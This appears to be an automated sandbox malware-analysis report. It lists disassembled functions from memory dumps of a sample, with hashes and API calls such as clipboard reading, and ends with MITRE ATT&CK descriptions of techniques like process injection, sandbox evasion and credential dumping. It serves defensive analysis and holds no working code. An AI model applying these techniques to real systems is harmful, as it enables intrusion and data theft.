Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
Instruction ID: 21a2246a7d2b4b35dc494bba2f4b78631a10c89df9ac8d713cd23d0779d29278
Opcode Fuzzy Hash: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
Instruction Fuzzy Hash: D4310372B456104BC318DA29CC823ABB7D297C9324F0AD63AE898D73D4E63CCC418791

Function 020EB288 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60f5b64229c358e55dcfd8d7bb48be719f7f9c79ed88e3e4dbcafda2f6c3ce3
Instruction ID: 50ea067c5158e5784bc2126aac4f466fcc2f3e48591cb041d9daa9bb0d94016e
Opcode Fuzzy Hash: f60f5b64229c358e55dcfd8d7bb48be719f7f9c79ed88e3e4dbcafda2f6c3ce3
Instruction Fuzzy Hash: 513128759483918FDB198B34C8917AFBBD1AFD7218F089A2CE4E293391D338C1468B57

Function 0041B021 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
Instruction ID: 6c2a7a40945fba97b60b2dc016bc6914b469ce470df0d3b36ab1ee23dd066ef4
Opcode Fuzzy Hash: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
Instruction Fuzzy Hash: 763159759483819BD718CB34C8A13BBBBD19B97318F189A2DE0E193391D338C5468B5B

Function 00431AF5 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
Instruction ID: c3ef201410797beedfbb423dd4b6a4b613f7a1191b873fa7b6aad00fbf48a4bb
Opcode Fuzzy Hash: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
Instruction Fuzzy Hash: D3210B6590D3C146D7394B3A44243B7EFE25FE7345F2C58AED0D987392DA798005871A

Function 020D8587 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
Instruction ID: 34b4074b409e0c824458e8ca4cf77f246e761f43e1647d2fc76f342a77c77b67
Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
Instruction Fuzzy Hash: F931F76650E7F24EC733892D449047DBAE099A612871E83FEDCF18B7C3C611C94693E1

Function 00408320 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
Instruction ID: b0168b037b63377ee53a696943b9184fc20a9d47a10823b489a3532680c59eb7
Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
Instruction Fuzzy Hash: 7B314B2290D6F30EC336892D449047E7AA05AE621472943FFDCF19B3C3C52AC94587E5

Function 020EB659 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction ID: 5a3507e927bda0750b0c1f729e5992713e58c6721e864162f64f8e5b75ac2aa2
Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction Fuzzy Hash: F231E4766183418BDB18CF39C89136BBBE2AB86318F18CA6DE4D2D7284D73CC445CB52

Function 0041B3F2 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction ID: f625d5dc7cc146dca826755e11d0e3d06b3d9b76c6b30af6ca5c7fe59dabf8e9
Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92

Function 0210EB27 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aff2747913e61d8e485ec3db636ec536704eedd3d1794fbcb6d77b268cc3f13
Instruction ID: b7e457c729fd8a95eb2b4dabe511790f3a6c04b7af20a8412c6c23efbe8a9753
Opcode Fuzzy Hash: 2aff2747913e61d8e485ec3db636ec536704eedd3d1794fbcb6d77b268cc3f13
Instruction Fuzzy Hash: EE219E39844317CBC7249F19C05067EF3B1FF48B90F56881ED88157260EB74A9A9CBC1

Function 0210116A Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0199799e75cbd837ee7f3b361dc18108ad832d3bad261f098223bc718b25986b
Instruction ID: 1aad4460bcd9722582b108e9f1d082475a586279f11333e7efb7390a564310f3
Opcode Fuzzy Hash: 0199799e75cbd837ee7f3b361dc18108ad832d3bad261f098223bc718b25986b
Instruction Fuzzy Hash: F621A3769583A04BE3348F359C953DBBBE2ABC6314F59C62CC8D957284DB7A1805CBC1

Function 00430F03 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6

Function 0210A497 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: f6fe38f32638254117dfd4003f9752c705f6690066de54428cd8f72f752624e1
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 9F11E533A492D40EC3168D3C8480579BFA30E93135F5D8399F9B9DB2D2C7238D8A8750

Function 0043A230 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A

Function 020FC847 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
Instruction ID: ed8fd348e8dfb7941f14d66d181e5ee3022ffca787119f5c78a9a4a0369c66d0
Opcode Fuzzy Hash: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
Instruction Fuzzy Hash: 38019EF1A4130557E6A2DE5484C1B37A2E96F80714F18803EDA1957E00DB66E807EB91

Function 0042C5E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD

Function 020E5202 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
Instruction ID: e42e4ed7444637acb9172daae2f8c068fd141d83b222e9267d2cdac5258e14ad
Opcode Fuzzy Hash: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
Instruction Fuzzy Hash: 23F0B43AA5D7504EE3048EE8D48436BFBD2EB81304F19947DC6C4A7581CAB998858B92

Function 020D275E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
Instruction ID: e23c4aed3e359ff0919f98341f407045f5ec6c2b6b54e8b2eadb2e6be647d692
Opcode Fuzzy Hash: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
Instruction Fuzzy Hash: 8EF05C6254A3404F87150E5988D03B8F7A74B97215708A56DD8D54719BC631C549E758

Function 020E921E Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
Instruction ID: e326c345bde377aa6e8bb6850dbeabc37b2ed60f2dbed3116b3c9db056a2dc49
Opcode Fuzzy Hash: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
Instruction Fuzzy Hash: 6EF082B1A0034ADFCF219F44C841AA7B7F5FF86350F044455F8864B220E735C551EB56

Function 0210EA3F Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
Instruction ID: 0b9b9b8d1acbc421fb4df588ac428151bad35d72c9f52a6cfd89ee711df870cb
Opcode Fuzzy Hash: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
Instruction Fuzzy Hash: C3F0A932A193508BC310DF268A0036BF7E1BFC6B04F48CC69D4D997210E278C5028756

Function 020EF647 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 68bc2438b9170b7e8c68db7a15aaad1cd2d7eec32e55d38bfe2f2de7c0c16392
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: D8D097A05083A20F4B898E3804A0837FBE4E943112B08148EE0D2E3414C321D8019258

Function 0041F3E0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D

Function 020F8EB2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
Instruction ID: ad7c06e57a303dba94bcd7d2aa197efc7e92ac1f9ab750114ca6719ae142e1d8
Opcode Fuzzy Hash: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
Instruction Fuzzy Hash: 77B048389482409B9604CF00E88042AF375AA8B200F14A418E84933310CA30E8008A89

Function 02107CC7 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02107CDB
GetClipboardData.USER32 ref: 02107CF6
GlobalLock.KERNEL32 ref: 02107D15
GlobalUnlock.KERNEL32 ref: 02107E4D
CloseClipboard.USER32 ref: 02107E58

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
Instruction ID: c9a4afe6a29076e97ca623fc3d36d652a45449244f2f884f901ea7e02048a3d6
Opcode Fuzzy Hash: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
Instruction Fuzzy Hash: 56417C7114C3818FD300EF7894883AEBFE1AB82314F09492DE4D58B2C1D7B9958AD763

Function 00437A60 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437A74
GetClipboardData.USER32 ref: 00437A8F
GlobalLock.KERNEL32 ref: 00437AAE
GlobalUnlock.KERNEL32 ref: 00437BE6
CloseClipboard.USER32 ref: 00437BF1

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7

Function 020F57C7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 020F5884

Strings

$%, xrefs: 020F580D
MO, xrefs: 020F57D9
p:#, xrefs: 020F58AE

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: $%$p:#$MO
API String ID: 237503144-3521940197
Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction ID: c0e96cbee9336228d481724a3f098cde9fbab6367f1fdbb76a62b9dbcf266781
Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction Fuzzy Hash: B741AE765583448BE310CF25C89475FBBE2FBC5758F16892CE4D49B680C6B9CA0A8B86

Function 00425560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D

Strings

MO, xrefs: 00425572
p:#, xrefs: 00425647
$%, xrefs: 004255A6

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $%$p:#$MO
API String ID: 237503144-3521940197
Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86

Function 0040C050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408CEE), ref: 0040C056
FreeLibrary.KERNEL32 ref: 0040C077

Strings

Wu, xrefs: 0040C056, 0040C077

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: 27da7d1ecd683459e61e314d26d97e783c391c34258efece46d9df52749a6e00
Instruction ID: 0ef2ccba0a006ca6fcd7738bd7119b4b32ceb5ba17d334e5b7befb7630811a2c
Opcode Fuzzy Hash: 27da7d1ecd683459e61e314d26d97e783c391c34258efece46d9df52749a6e00
Instruction Fuzzy Hash: 07C04C3D810404DFEF117FB7FE098183AB1FB4273A3140834F40241036DA264921EB1D

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

